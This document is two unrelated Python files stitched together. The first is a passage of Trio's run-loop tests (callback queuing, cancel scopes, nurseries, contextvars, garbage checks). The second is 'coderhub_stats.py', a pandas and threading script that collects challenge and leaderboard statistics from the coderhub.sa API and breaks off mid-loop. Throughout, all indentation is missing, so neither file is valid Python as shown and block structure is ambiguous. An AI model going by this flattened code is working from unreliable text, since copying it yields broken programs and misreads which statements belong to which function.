# We guarantee FIFO
assert record == list(range(100))
def test_TrioToken_run_sync_soon_idempotent_requeue():
# We guarantee that if a call has finished, queueing it again will call it
# again. Due to the lack of synchronization, this effectively means that
# we have to guarantee that once a call has *started*, queueing it again
# will call it again. Also this is much easier to test :-)
record = []
def redo(token):
record.append(None)
try:
token.run_sync_soon(redo, token, idempotent=True)
except _core.RunFinishedError:
pass
async def main():
token = _core.current_trio_token()
token.run_sync_soon(redo, token, idempotent=True)
await _core.checkpoint()
await _core.checkpoint()
await _core.checkpoint()
_core.run(main)
assert len(record) >= 2
def test_TrioToken_run_sync_soon_after_main_crash():
record = []
async def main():
token = _core.current_trio_token()
# After main exits but before finally cleaning up, callback processed
# normally
token.run_sync_soon(lambda: record.append("sync-cb"))
raise ValueError
with pytest.raises(ValueError):
_core.run(main)
assert record == ["sync-cb"]
def test_TrioToken_run_sync_soon_crashes():
record = set()
async def main():
token = _core.current_trio_token()
token.run_sync_soon(lambda: dict()["nope"])
# check that a crashing run_sync_soon callback doesn't stop further
# calls to run_sync_soon
token.run_sync_soon(lambda: record.add("2nd run_sync_soon ran"))
try:
await sleep_forever()
except _core.Cancelled:
record.add("cancelled!")
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is KeyError
assert record == {"2nd run_sync_soon ran", "cancelled!"}
async def test_TrioToken_run_sync_soon_FIFO():
N = 100
record = []
token = _core.current_trio_token()
for i in range(N):
token.run_sync_soon(lambda j: record.append(j), i)
await wait_all_tasks_blocked()
assert record == list(range(N))
def test_TrioToken_run_sync_soon_starvation_resistance():
# Even if we push callbacks in from callbacks, so that the callback queue
# never empties out, then we still can't starve out other tasks from
# running.
token = None
record = []
def naughty_cb(i):
nonlocal token
try:
token.run_sync_soon(naughty_cb, i + 1)
except _core.RunFinishedError:
record.append(("run finished", i))
async def main():
nonlocal token
token = _core.current_trio_token()
token.run_sync_soon(naughty_cb, 0)
record.append("starting")
for _ in range(20):
await _core.checkpoint()
_core.run(main)
assert len(record) == 2
assert record[0] == "starting"
assert record[1][0] == "run finished"
assert record[1][1] >= 19
def test_TrioToken_run_sync_soon_threaded_stress_test():
cb_counter = 0
def cb():
nonlocal cb_counter
cb_counter += 1
def stress_thread(token):
try:
while True:
token.run_sync_soon(cb)
time.sleep(0)
except _core.RunFinishedError:
pass
async def main():
token = _core.current_trio_token()
thread = threading.Thread(target=stress_thread, args=(token,))
thread.start()
for _ in range(10):
start_value = cb_counter
while cb_counter == start_value:
await sleep(0.01)
_core.run(main)
print(cb_counter)
async def test_TrioToken_run_sync_soon_massive_queue():
# There are edge cases in the wakeup fd code when the wakeup fd overflows,
# so let's try to make that happen. This is also just a good stress test
# in general. (With the current-as-of-2017-02-14 code using a socketpair
# with minimal buffer, Linux takes 6 wakeups to fill the buffer and macOS
# takes 1 wakeup. So 1000 is overkill if anything. Windows OTOH takes
# ~600,000 wakeups, but has the same code paths...)
COUNT = 1000
token = _core.current_trio_token()
counter = [0]
def cb(i):
# This also tests FIFO ordering of callbacks
assert counter[0] == i
counter[0] += 1
for i in range(COUNT):
token.run_sync_soon(cb, i)
await wait_all_tasks_blocked()
assert counter[0] == COUNT
@pytest.mark.skipif(buggy_pypy_asyncgens, reason="PyPy 7.2 is buggy")
def test_TrioToken_run_sync_soon_late_crash():
# Crash after system nursery is closed -- easiest way to do that is
# from an async generator finalizer.
record = []
saved = []
async def agen():
token = _core.current_trio_token()
try:
yield 1
finally:
token.run_sync_soon(lambda: {}["nope"])
token.run_sync_soon(lambda: record.append("2nd ran"))
async def main():
saved.append(agen())
await saved[-1].asend(None)
record.append("main exiting")
with pytest.raises(_core.TrioInternalError) as excinfo:
_core.run(main)
assert type(excinfo.value.__cause__) is KeyError
assert record == ["main exiting", "2nd ran"]
async def test_slow_abort_basic():
with _core.CancelScope() as scope:
scope.cancel()
with pytest.raises(_core.Cancelled):
task = _core.current_task()
token = _core.current_trio_token()
def slow_abort(raise_cancel):
result = outcome.capture(raise_cancel)
token.run_sync_soon(_core.reschedule, task, result)
return _core.Abort.FAILED
await _core.wait_task_rescheduled(slow_abort)
async def test_slow_abort_edge_cases():
record = []
async def slow_aborter():
task = _core.current_task()
token = _core.current_trio_token()
def slow_abort(raise_cancel):
record.append("abort-called")
result = outcome.capture(raise_cancel)
token.run_sync_soon(_core.reschedule, task, result)
return _core.Abort.FAILED
with pytest.raises(_core.Cancelled):
record.append("sleeping")
await _core.wait_task_rescheduled(slow_abort)
record.append("cancelled")
# blocking again, this time it's okay, because we're shielded
await _core.checkpoint()
record.append("done")
with _core.CancelScope() as outer1:
with _core.CancelScope() as outer2:
async with _core.open_nursery() as nursery:
# So we have a task blocked on an operation that can't be
# aborted immediately
nursery.start_soon(slow_aborter)
await wait_all_tasks_blocked()
assert record == ["sleeping"]
# And then we cancel it, so the abort callback gets run
outer1.cancel()
assert record == ["sleeping", "abort-called"]
# In fact that happens twice! (This used to cause the abort
# callback to be run twice)
outer2.cancel()
assert record == ["sleeping", "abort-called"]
# But then before the abort finishes, the task gets shielded!
nursery.cancel_scope.shield = True
# Now we wait for the task to finish...
# The cancellation was delivered, even though it was shielded
assert record == ["sleeping", "abort-called", "cancelled", "done"]
async def test_task_tree_introspection():
tasks = {}
nurseries = {}
async def parent(task_status=_core.TASK_STATUS_IGNORED):
tasks["parent"] = _core.current_task()
assert tasks["parent"].child_nurseries == []
async with _core.open_nursery() as nursery1:
async with _core.open_nursery() as nursery2:
assert tasks["parent"].child_nurseries == [nursery1, nursery2]
assert tasks["parent"].child_nurseries == []
async with _core.open_nursery() as nursery:
nurseries["parent"] = nursery
await nursery.start(child1)
# Upward links survive after tasks/nurseries exit
assert nurseries["parent"].parent_task is tasks["parent"]
assert tasks["child1"].parent_nursery is nurseries["parent"]
assert nurseries["child1"].parent_task is tasks["child1"]
assert tasks["child2"].parent_nursery is nurseries["child1"]
nursery = _core.current_task().parent_nursery
# Make sure that chaining eventually gives a nursery of None (and not,
# for example, an error)
while nursery is not None:
t = nursery.parent_task
nursery = t.parent_nursery
async def child2():
tasks["child2"] = _core.current_task()
assert tasks["parent"].child_nurseries == [nurseries["parent"]]
assert nurseries["parent"].child_tasks == frozenset({tasks["child1"]})
assert tasks["child1"].child_nurseries == [nurseries["child1"]]
assert nurseries["child1"].child_tasks == frozenset({tasks["child2"]})
assert tasks["child2"].child_nurseries == []
async def child1(task_status=_core.TASK_STATUS_IGNORED):
me = tasks["child1"] = _core.current_task()
assert me.parent_nursery.parent_task is tasks["parent"]
assert me.parent_nursery is not nurseries["parent"]
assert me.eventual_parent_nursery is nurseries["parent"]
task_status.started()
assert me.parent_nursery is nurseries["parent"]
assert me.eventual_parent_nursery is None
# Wait for the start() call to return and close its internal nursery, to
# ensure consistent results in child2:
await _core.wait_all_tasks_blocked()
async with _core.open_nursery() as nursery:
nurseries["child1"] = nursery
nursery.start_soon(child2)
async with _core.open_nursery() as nursery:
nursery.start_soon(parent)
# There are no pending starts, so no one should have a non-None
# eventual_parent_nursery
for task in tasks.values():
assert task.eventual_parent_nursery is None
async def test_nursery_closure():
async def child1(nursery):
# We can add new tasks to the nursery even after entering __aexit__,
# so long as there are still tasks running
nursery.start_soon(child2)
async def child2():
pass
async with _core.open_nursery() as nursery:
nursery.start_soon(child1, nursery)
# But once we've left __aexit__, the nursery is closed
with pytest.raises(RuntimeError):
nursery.start_soon(child2)
async def test_spawn_name():
async def func1(expected):
task = _core.current_task()
assert expected in task.name
async def func2(): # pragma: no cover
pass
async with _core.open_nursery() as nursery:
for spawn_fn in [nursery.start_soon, _core.spawn_system_task]:
spawn_fn(func1, "func1")
spawn_fn(func1, "func2", name=func2)
spawn_fn(func1, "func3", name="func3")
spawn_fn(functools.partial(func1, "func1"))
spawn_fn(func1, "object", name=object())
async def test_current_effective_deadline(mock_clock):
assert _core.current_effective_deadline() == inf
with _core.CancelScope(deadline=5) as scope1:
with _core.CancelScope(deadline=10) as scope2:
assert _core.current_effective_deadline() == 5
scope2.deadline = 3
assert _core.current_effective_deadline() == 3
scope2.deadline = 10
assert _core.current_effective_deadline() == 5
scope2.shield = True
assert _core.current_effective_deadline() == 10
scope2.shield = False
assert _core.current_effective_deadline() == 5
scope1.cancel()
assert _core.current_effective_deadline() == -inf
scope2.shield = True
assert _core.current_effective_deadline() == 10
assert _core.current_effective_deadline() == -inf
assert _core.current_effective_deadline() == inf
def test_nice_error_on_bad_calls_to_run_or_spawn():
def bad_call_run(*args):
_core.run(*args)
def bad_call_spawn(*args):
async def main():
async with _core.open_nursery() as nursery:
nursery.start_soon(*args)
_core.run(main)
for bad_call in bad_call_run, bad_call_spawn:
async def f(): # pragma: no cover
pass
with pytest.raises(TypeError, match="expecting an async function"):
bad_call(f())
async def async_gen(arg): # pragma: no cover
yield arg
with pytest.raises(
TypeError, match="expected an async function but got an async generator"
):
bad_call(async_gen, 0)
def test_calling_asyncio_function_gives_nice_error():
async def child_xyzzy():
await create_asyncio_future_in_new_loop()
async def misguided():
await child_xyzzy()
with pytest.raises(TypeError) as excinfo:
_core.run(misguided)
assert "asyncio" in str(excinfo.value)
# The traceback should point to the location of the foreign await
assert any( # pragma: no branch
entry.name == "child_xyzzy" for entry in excinfo.traceback
)
async def test_asyncio_function_inside_nursery_does_not_explode():
# Regression test for https://github.com/python-trio/trio/issues/552
with pytest.raises(TypeError) as excinfo:
async with _core.open_nursery() as nursery:
import asyncio
nursery.start_soon(sleep_forever)
await create_asyncio_future_in_new_loop()
assert "asyncio" in str(excinfo.value)
async def test_trivial_yields():
with assert_checkpoints():
await _core.checkpoint()
with assert_checkpoints():
await _core.checkpoint_if_cancelled()
await _core.cancel_shielded_checkpoint()
with assert_checkpoints():
async with _core.open_nursery():
pass
with _core.CancelScope() as cancel_scope:
cancel_scope.cancel()
with pytest.raises(_core.MultiError) as excinfo:
async with _core.open_nursery():
raise KeyError
assert len(excinfo.value.exceptions) == 2
assert {type(e) for e in excinfo.value.exceptions} == {
KeyError,
_core.Cancelled,
}
async def test_nursery_start(autojump_clock):
async def no_args(): # pragma: no cover
pass
# Errors in calling convention get raised immediately from start
async with _core.open_nursery() as nursery:
with pytest.raises(TypeError):
await nursery.start(no_args)
async def sleep_then_start(seconds, *, task_status=_core.TASK_STATUS_IGNORED):
repr(task_status) # smoke test
await sleep(seconds)
task_status.started(seconds)
await sleep(seconds)
# Basic happy-path check: start waits for the task to call started(), then
# returns, passes back the value, and the given nursery then waits for it
# to exit.
for seconds in [1, 2]:
async with _core.open_nursery() as nursery:
assert len(nursery.child_tasks) == 0
t0 = _core.current_time()
assert await nursery.start(sleep_then_start, seconds) == seconds
assert _core.current_time() - t0 == seconds
assert len(nursery.child_tasks) == 1
assert _core.current_time() - t0 == 2 * seconds
# Make sure TASK_STATUS_IGNORED works so task function can be called
# directly
t0 = _core.current_time()
await sleep_then_start(3)
assert _core.current_time() - t0 == 2 * 3
# calling started twice
async def double_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started()
with pytest.raises(RuntimeError):
task_status.started()
async with _core.open_nursery() as nursery:
await nursery.start(double_started)
# child crashes before calling started -> error comes out of .start()
async def raise_keyerror(task_status=_core.TASK_STATUS_IGNORED):
raise KeyError("oops")
async with _core.open_nursery() as nursery:
with pytest.raises(KeyError):
await nursery.start(raise_keyerror)
# child exiting cleanly before calling started -> triggers a RuntimeError
async def nothing(task_status=_core.TASK_STATUS_IGNORED):
return
async with _core.open_nursery() as nursery:
with pytest.raises(RuntimeError) as excinfo:
await nursery.start(nothing)
assert "exited without calling" in str(excinfo.value)
# if the call to start() is cancelled, then the call to started() does
# nothing -- the child keeps executing under start(). The value it passed
# is ignored; start() raises Cancelled.
async def just_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started("hi")
async with _core.open_nursery() as nursery:
with _core.CancelScope() as cs:
cs.cancel()
with pytest.raises(_core.Cancelled):
await nursery.start(just_started)
# and if after the no-op started(), the child crashes, the error comes out
# of start()
async def raise_keyerror_after_started(task_status=_core.TASK_STATUS_IGNORED):
task_status.started()
raise KeyError("whoopsiedaisy")
async with _core.open_nursery() as nursery:
with _core.CancelScope() as cs:
cs.cancel()
with pytest.raises(_core.MultiError) as excinfo:
await nursery.start(raise_keyerror_after_started)
assert {type(e) for e in excinfo.value.exceptions} == {
_core.Cancelled,
KeyError,
}
# trying to start in a closed nursery raises an error immediately
async with _core.open_nursery() as closed_nursery:
pass
t0 = _core.current_time()
with pytest.raises(RuntimeError):
await closed_nursery.start(sleep_then_start, 7)
assert _core.current_time() == t0
async def test_task_nursery_stack():
task = _core.current_task()
assert task._child_nurseries == []
async with _core.open_nursery() as nursery1:
assert task._child_nurseries == [nursery1]
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery2:
assert task._child_nurseries == [nursery1, nursery2]
raise KeyError
assert task._child_nurseries == [nursery1]
assert task._child_nurseries == []
async def test_nursery_start_with_cancelled_nursery():
# This function isn't testing task_status, it's using task_status as a
# convenient way to get a nursery that we can test spawning stuff into.
async def setup_nursery(task_status=_core.TASK_STATUS_IGNORED):
async with _core.open_nursery() as nursery:
task_status.started(nursery)
await sleep_forever()
# Calls started() while children are asleep, so we can make sure
# that the cancellation machinery notices and aborts when a sleeping task
# is moved into a cancelled scope.
async def sleeping_children(fn, *, task_status=_core.TASK_STATUS_IGNORED):
async with _core.open_nursery() as nursery:
nursery.start_soon(sleep_forever)
nursery.start_soon(sleep_forever)
await wait_all_tasks_blocked()
fn()
task_status.started()
# Cancelling the setup_nursery just *before* calling started()
async with _core.open_nursery() as nursery:
target_nursery = await nursery.start(setup_nursery)
await target_nursery.start(
sleeping_children, target_nursery.cancel_scope.cancel
)
# Cancelling the setup_nursery just *after* calling started()
async with _core.open_nursery() as nursery:
target_nursery = await nursery.start(setup_nursery)
await target_nursery.start(sleeping_children, lambda: None)
target_nursery.cancel_scope.cancel()
async def test_nursery_start_keeps_nursery_open(autojump_clock):
async def sleep_a_bit(task_status=_core.TASK_STATUS_IGNORED):
await sleep(2)
task_status.started()
await sleep(3)
async with _core.open_nursery() as nursery1:
t0 = _core.current_time()
async with _core.open_nursery() as nursery2:
# Start the 'start' call running in the background
nursery1.start_soon(nursery2.start, sleep_a_bit)
# Sleep a bit
await sleep(1)
# Start another one.
nursery1.start_soon(nursery2.start, sleep_a_bit)
# Then exit this nursery. At this point, there are no tasks
# present in this nursery -- the only thing keeping it open is
# that the tasks will be placed into it soon, when they call
# started().
assert _core.current_time() - t0 == 6
# Check that it still works even if the task that the nursery is waiting
# for ends up crashing, and never actually enters the nursery.
async def sleep_then_crash(task_status=_core.TASK_STATUS_IGNORED):
await sleep(7)
raise KeyError
async def start_sleep_then_crash(nursery):
with pytest.raises(KeyError):
await nursery.start(sleep_then_crash)
async with _core.open_nursery() as nursery1:
t0 = _core.current_time()
async with _core.open_nursery() as nursery2:
nursery1.start_soon(start_sleep_then_crash, nursery2)
await wait_all_tasks_blocked()
assert _core.current_time() - t0 == 7
async def test_nursery_explicit_exception():
with pytest.raises(KeyError):
async with _core.open_nursery():
raise KeyError()
async def test_nursery_stop_iteration():
async def fail():
raise ValueError
try:
async with _core.open_nursery() as nursery:
nursery.start_soon(fail)
raise StopIteration
except _core.MultiError as e:
assert tuple(map(type, e.exceptions)) == (StopIteration, ValueError)
async def test_nursery_stop_async_iteration():
class it:
def __init__(self, count):
self.count = count
self.val = 0
async def __anext__(self):
await sleep(0)
val = self.val
if val >= self.count:
raise StopAsyncIteration
self.val += 1
return val
class async_zip:
def __init__(self, *largs):
self.nexts = [obj.__anext__ for obj in largs]
async def _accumulate(self, f, items, i):
items[i] = await f()
def __aiter__(self):
return self
async def __anext__(self):
nexts = self.nexts
items = [None] * len(nexts)
got_stop = False
def handle(exc):
nonlocal got_stop
if isinstance(exc, StopAsyncIteration):
got_stop = True
return None
else: # pragma: no cover
return exc
with _core.MultiError.catch(handle):
async with _core.open_nursery() as nursery:
for i, f in enumerate(nexts):
nursery.start_soon(self._accumulate, f, items, i)
if got_stop:
raise StopAsyncIteration
return items
result = []
async for vals in async_zip(it(4), it(2)):
result.append(vals)
assert result == [[0, 0], [1, 1]]
async def test_traceback_frame_removal():
async def my_child_task():
raise KeyError()
try:
# Trick: For now cancel/nursery scopes still leave a bunch of tb gunk
# behind. But if there's a MultiError, they leave it on the MultiError,
# which lets us get a clean look at the KeyError itself. Someday I
# guess this will always be a MultiError (#611), but for now we can
# force it by raising two exceptions.
async with _core.open_nursery() as nursery:
nursery.start_soon(my_child_task)
nursery.start_soon(my_child_task)
except _core.MultiError as exc:
first_exc = exc.exceptions[0]
assert isinstance(first_exc, KeyError)
# The top frame in the exception traceback should be inside the child
# task, not trio/contextvars internals. And there's only one frame
# inside the child task, so this will also detect if our frame-removal
# is too eager.
frame = first_exc.__traceback__.tb_frame
assert frame.f_code is my_child_task.__code__
def test_contextvar_support():
var = contextvars.ContextVar("test")
var.set("before")
assert var.get() == "before"
async def inner():
task = _core.current_task()
assert task.context.get(var) == "before"
assert var.get() == "before"
var.set("after")
assert var.get() == "after"
assert var in task.context
assert task.context.get(var) == "after"
_core.run(inner)
assert var.get() == "before"
async def test_contextvar_multitask():
var = contextvars.ContextVar("test", default="hmmm")
async def t1():
assert var.get() == "hmmm"
var.set("hmmmm")
assert var.get() == "hmmmm"
async def t2():
assert var.get() == "hmmmm"
async with _core.open_nursery() as n:
n.start_soon(t1)
await wait_all_tasks_blocked()
assert var.get() == "hmmm"
var.set("hmmmm")
n.start_soon(t2)
await wait_all_tasks_blocked()
def test_system_task_contexts():
cvar = contextvars.ContextVar("qwilfish")
cvar.set("water")
async def system_task():
assert cvar.get() == "water"
async def regular_task():
assert cvar.get() == "poison"
async def inner():
async with _core.open_nursery() as nursery:
cvar.set("poison")
nursery.start_soon(regular_task)
_core.spawn_system_task(system_task)
await wait_all_tasks_blocked()
_core.run(inner)
def test_Nursery_init():
with pytest.raises(TypeError):
_core._run.Nursery(None, None)
async def test_Nursery_private_init():
# context manager creation should not raise
async with _core.open_nursery() as nursery:
assert False == nursery._closed
def test_Nursery_subclass():
with pytest.raises(TypeError):
class Subclass(_core._run.Nursery):
pass
def test_Cancelled_init():
with pytest.raises(TypeError):
raise _core.Cancelled
with pytest.raises(TypeError):
_core.Cancelled()
# private constructor should not raise
_core.Cancelled._create()
def test_Cancelled_str():
cancelled = _core.Cancelled._create()
assert str(cancelled) == "Cancelled"
def test_Cancelled_subclass():
with pytest.raises(TypeError):
class Subclass(_core.Cancelled):
pass
def test_CancelScope_subclass():
with pytest.raises(TypeError):
class Subclass(_core.CancelScope):
pass
def test_sniffio_integration():
with pytest.raises(sniffio.AsyncLibraryNotFoundError):
sniffio.current_async_library()
async def check_inside_trio():
assert sniffio.current_async_library() == "trio"
_core.run(check_inside_trio)
with pytest.raises(sniffio.AsyncLibraryNotFoundError):
sniffio.current_async_library()
async def test_Task_custom_sleep_data():
task = _core.current_task()
assert task.custom_sleep_data is None
task.custom_sleep_data = 1
assert task.custom_sleep_data == 1
await _core.checkpoint()
assert task.custom_sleep_data is None
@types.coroutine
def async_yield(value):
yield value
async def test_permanently_detach_coroutine_object():
task = None
pdco_outcome = None
async def detachable_coroutine(task_outcome, yield_value):
await sleep(0)
nonlocal task, pdco_outcome
task = _core.current_task()
pdco_outcome = await outcome.acapture(
_core.permanently_detach_coroutine_object, task_outcome
)
await async_yield(yield_value)
async with _core.open_nursery() as nursery:
nursery.start_soon(detachable_coroutine, outcome.Value(None), "I'm free!")
# If we get here then Trio thinks the task has exited... but the coroutine
# is still iterable
assert pdco_outcome is None
assert task.coro.send("be free!") == "I'm free!"
assert pdco_outcome == outcome.Value("be free!")
with pytest.raises(StopIteration):
task.coro.send(None)
# Check the exception paths too
task = None
pdco_outcome = None
with pytest.raises(KeyError):
async with _core.open_nursery() as nursery:
nursery.start_soon(detachable_coroutine, outcome.Error(KeyError()), "uh oh")
throw_in = ValueError()
assert task.coro.throw(throw_in) == "uh oh"
assert pdco_outcome == outcome.Error(throw_in)
with pytest.raises(StopIteration):
task.coro.send(None)
async def bad_detach():
async with _core.open_nursery():
with pytest.raises(RuntimeError) as excinfo:
await _core.permanently_detach_coroutine_object(outcome.Value(None))
assert "open nurser" in str(excinfo.value)
async with _core.open_nursery() as nursery:
nursery.start_soon(bad_detach)
async def test_detach_and_reattach_coroutine_object():
unrelated_task = None
task = None
async def unrelated_coroutine():
nonlocal unrelated_task
unrelated_task = _core.current_task()
async def reattachable_coroutine():
await sleep(0)
nonlocal task
task = _core.current_task()
def abort_fn(_): # pragma: no cover
return _core.Abort.FAILED
got = await _core.temporarily_detach_coroutine_object(abort_fn)
assert got == "not trio!"
await async_yield(1)
await async_yield(2)
with pytest.raises(RuntimeError) as excinfo:
await _core.reattach_detached_coroutine_object(unrelated_task, None)
assert "does not match" in str(excinfo.value)
await _core.reattach_detached_coroutine_object(task, "byebye")
await sleep(0)
async with _core.open_nursery() as nursery:
nursery.start_soon(unrelated_coroutine)
nursery.start_soon(reattachable_coroutine)
await wait_all_tasks_blocked()
assert unrelated_task is not None
assert task is not None
# Okay, it's detached. Here's our coroutine runner:
assert task.coro.send("not trio!") == 1
assert task.coro.send(None) == 2
assert task.coro.send(None) == "byebye"
# Now it's been reattached, and we can leave the nursery
async def test_detached_coroutine_cancellation():
abort_fn_called = False
task = None
async def reattachable_coroutine():
await sleep(0)
nonlocal task
task = _core.current_task()
def abort_fn(_):
nonlocal abort_fn_called
abort_fn_called = True
return _core.Abort.FAILED
await _core.temporarily_detach_coroutine_object(abort_fn)
await _core.reattach_detached_coroutine_object(task, None)
with pytest.raises(_core.Cancelled):
await sleep(0)
async with _core.open_nursery() as nursery:
nursery.start_soon(reattachable_coroutine)
await wait_all_tasks_blocked()
assert task is not None
nursery.cancel_scope.cancel()
task.coro.send(None)
assert abort_fn_called
@restore_unraisablehook()
def test_async_function_implemented_in_C():
# These used to crash because we'd try to mutate the coroutine object's
# cr_frame, but C functions don't have Python frames.
async def agen_fn(record):
assert not _core.currently_ki_protected()
record.append("the generator ran")
yield
run_record = []
agen = agen_fn(run_record)
_core.run(agen.__anext__)
assert run_record == ["the generator ran"]
async def main():
start_soon_record = []
agen = agen_fn(start_soon_record)
async with _core.open_nursery() as nursery:
nursery.start_soon(agen.__anext__)
assert start_soon_record == ["the generator ran"]
_core.run(main)
async def test_very_deep_cancel_scope_nesting():
# This used to crash with a RecursionError in CancelStatus.recalculate
with ExitStack() as exit_stack:
outermost_scope = _core.CancelScope()
exit_stack.enter_context(outermost_scope)
for _ in range(5000):
exit_stack.enter_context(_core.CancelScope())
outermost_scope.cancel()
async def test_cancel_scope_deadline_duplicates():
# This exercises an assert in Deadlines._prune, by intentionally creating
# duplicate entries in the deadline heap.
now = _core.current_time()
with _core.CancelScope() as cscope:
for _ in range(DEADLINE_HEAP_MIN_PRUNE_THRESHOLD * 2):
cscope.deadline = now + 9998
cscope.deadline = now + 9999
await sleep(0.01)
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_simple_cancel_scope_usage_doesnt_create_cyclic_garbage():
# https://github.com/python-trio/trio/issues/1770
gc.collect()
async def do_a_cancel():
with _core.CancelScope() as cscope:
cscope.cancel()
await sleep_forever()
async def crasher():
raise ValueError
old_flags = gc.get_debug()
try:
gc.collect()
gc.set_debug(gc.DEBUG_SAVEALL)
# cover outcome.Error.unwrap
# (See https://github.com/python-trio/outcome/pull/29)
await do_a_cancel()
# cover outcome.Error.unwrap if unrolled_run hangs on to exception refs
# (See https://github.com/python-trio/trio/pull/1864)
await do_a_cancel()
with pytest.raises(ValueError):
async with _core.open_nursery() as nursery:
# cover MultiError.filter and NurseryManager.__aexit__
nursery.start_soon(crasher)
gc.collect()
assert not gc.garbage
finally:
gc.set_debug(old_flags)
gc.garbage.clear()
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_cancel_scope_exit_doesnt_create_cyclic_garbage():
# https://github.com/python-trio/trio/pull/2063
gc.collect()
async def crasher():
raise ValueError
old_flags = gc.get_debug()
try:
with pytest.raises(ValueError), _core.CancelScope() as outer:
async with _core.open_nursery() as nursery:
gc.collect()
gc.set_debug(gc.DEBUG_SAVEALL)
# One child that gets cancelled by the outer scope
nursery.start_soon(sleep_forever)
outer.cancel()
# And one that raises a different error
nursery.start_soon(crasher)
# so that outer filters a Cancelled from the MultiError and
# covers CancelScope.__exit__ (and NurseryManager.__aexit__)
# (See https://github.com/python-trio/trio/pull/2063)
gc.collect()
assert not gc.garbage
finally:
gc.set_debug(old_flags)
gc.garbage.clear()
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_nursery_cancel_doesnt_create_cyclic_garbage():
# https://github.com/python-trio/trio/issues/1770#issuecomment-730229423
def toggle_collected():
nonlocal collected
collected = True
collected = False
gc.collect()
old_flags = gc.get_debug()
try:
gc.set_debug(0)
gc.collect()
gc.set_debug(gc.DEBUG_SAVEALL)
# cover Nursery._nested_child_finished
async with _core.open_nursery() as nursery:
nursery.cancel_scope.cancel()
weakref.finalize(nursery, toggle_collected)
del nursery
# a checkpoint clears the nursery from the internals, apparently
# TODO: stop event loop from hanging on to the nursery at this point
await _core.checkpoint()
assert collected
gc.collect()
assert not gc.garbage
finally:
gc.set_debug(old_flags)
gc.garbage.clear()
@pytest.mark.skipif(
sys.implementation.name != "cpython", reason="Only makes sense with refcounting GC"
)
async def test_locals_destroyed_promptly_on_cancel():
destroyed = False
def finalizer():
nonlocal destroyed
destroyed = True
class A:
pass
async def task():
a = A()
weakref.finalize(a, finalizer)
await _core.checkpoint()
async with _core.open_nursery() as nursery:
nursery.start_soon(task)
nursery.cancel_scope.cancel()
assert destroyed
|
coderhub_stats.py
|
"""
the purpose of this file is to collect data from coderhub.sa API, prepare and group it
to make it easier to start analysing the data
"""
import pandas as pd
import time
from coderhub import CoderHub
import threading
import requests
class CoderHubStats(CoderHub):
users_data = {}
threads_lst = []
def get_challenges_stats(self) -> dict:
"""
get easy challenges count, medium challenges count, hard
challenges count and aal challenges together count
Example result :
all_challenges 98.00
easy_challenges 56.00
medium_challenges 31.00
hard_challenges 11.00
easy_challenges_percentage 57.14
medium_challenges_percentage 31.63
hard_challenges_percentage 11.22
Returns:
pandas.Dataframe
Exceptions :
- requests.exceptions.ConnectionError
"""
load_data = CoderHub.get_challenges(self)
df = pd.json_normalize(load_data['result'])
# count challenges
all_challenges_count = len(df)
easy_challenges_count = len(df[df["type_of_level.name"] == "سهل"])
med_challenges_count = len(df[df["type_of_level.name"] == "متوسط"])
hard_challenges_count = len(df[df["type_of_level.name"] == "صعب"])
# calculate challenges percentages
easy_challenges_percentage = (easy_challenges_count/all_challenges_count)*100
med_challenges_percentage = (med_challenges_count/all_challenges_count)*100
hard_challenges_percentage = (hard_challenges_count/all_challenges_count)*100
# rounding numbers
easy_challenges_percentage = round(easy_challenges_percentage, 2)
med_challenges_percentage = round(med_challenges_percentage, 2)
hard_challenges_percentage = round(hard_challenges_percentage, 2)
challenges_stats = {
'all_challenges': all_challenges_count,
'easy_challenges': easy_challenges_count,
'medium_challenges': med_challenges_count,
'hard_challenges': hard_challenges_count,
'easy_challenges_percentage': easy_challenges_percentage,
'medium_challenges_percentage': med_challenges_percentage,
'hard_challenges_percentage': hard_challenges_percentage
}
return challenges_stats
def get_languages_names(self):
"""
Returns:
a list containing all programing languages names available in coderhub.sa
Exceptions :
- requests.exceptions.ConnectionError
"""
load_data = CoderHub.get_languages(self)
languages = [i['name'] for i in load_data['result']]
return languages
def get_leaderboard_datatable(self) -> pd.DataFrame:
"""
get top 10 users for every language, their rank and their point from the leaderboard
Example result :
users points rank language
0 ahmed0ksa 921.0 1 swift
1 alxd7my 911.0 2 swift
2 iX901 906.0 3 swift
3 ahmadajr1 906.0 4 swift
4 vdotup 906.0 5 swift
Returns:
pandas.DataFrame
Exceptions :
- requests.exceptions.ConnectionError
"""
leaderboard_df = pd.DataFrame()
pts_lst = []
rnk_lst = []
lng_lst = []
users_lst = []
for lang in self.get_languages_names():
top10_users = self.get_leaderBoard(lang)['leaderboard']
for user in top10_users:
pts_lst.append(user['points'])
rnk_lst.append(user['rank'])
lng_lst.append(str(lang))
users_lst.append(user['user_info']['username'])
leaderboard_df.insert(0, "language", lng_lst)
leaderboard_df.insert(0, "rank", rnk_lst)
leaderboard_df.insert(0, "points", pts_lst)
leaderboard_df.insert(0, "users", users_lst)
return leaderboard_df
def fetch_user_data(self, user):
"""
fetch user information (provided by the API) and append it to users_data dictionary, if user
profile is private the value will be 'private' for that user
Args:
user:
username that will be passed to get_user_statistics()
Returns:
None
Exceptions :
- requests.exceptions.ConnectionError
"""
try:
user_data = self.get_user_statistics(user)
self.users_data[str(user)] = user_data
except Exception :
self.users_data[str(user)] = "private"
def get_top_users_stats(self) -> pd.DataFrame:
"""
expand the data given from get_leaderboard_datatable() and add more information
Example result :
users points rank language total_challenges_solved total_challenges_solved_all_languages ...
0 ahmed0ksa 921 1 swift 107 107
1 alxd7my 911 2 swift 106 114
2 iX901 906 3 swift 105 105
3 ahmadajr1 906 4 swift 105 105
4 nnoaid 906 8 python private private
...
Returns:
pandas.Dataframe
Exceptions :
- requests.exceptions.ConnectionError
"""
leaderboard_datatable = self.get_leaderboard_datatable()
users_lst = leaderboard_datatable['users']
languages_lst = leaderboard_datatable['language']
total_solved_challenges = []
total_solved_challenges_all_languages = []
total_easy_solved = []
total_med_solved = []
total_hard_solved = []
total_points = []
start_timer = time.perf_counter()
for user in users_lst:
x = threading.Thread(target=self.fetch_user_data, args=(user,))
self.threads_lst.append(x)
x.start()
for thread in self.threads_lst:
